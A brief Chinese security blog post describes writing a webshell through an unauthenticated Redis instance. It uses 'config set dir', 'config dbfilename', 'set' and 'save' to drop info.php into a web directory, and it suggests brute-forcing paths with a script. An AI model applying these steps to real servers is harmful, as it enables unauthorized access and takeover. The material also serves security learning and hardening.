本文最后更新于 2018年03月06日 17:19 可能会因为没有更新而失效。如已失效或需要修正,请留言!

开学了,文章更新会慢,见谅。
@X1r0z原文

利用 redis 获取 webshell

端口 6379

server
redis 未授权 getshell-ChaBug安全
telnet 连接

redis 配置里有 dir 和 dbfilename

dir 存储路径 dbfilename 存储文件名
redis 未授权 getshell-ChaBug安全
save 保存
redis 未授权 getshell-ChaBug安全
写 webshell

config set dir 路径
config dbfilename 文件名
set web 内容
save
redis 未授权 getshell-ChaBug安全
访问 info.php
redis 未授权 getshell-ChaBug安全
另外 config set 不存在的 dir 会报错
redis 未授权 getshell-ChaBug安全
可以写个脚本爆破路径

喜欢这篇文章的话就点一点喜欢吧!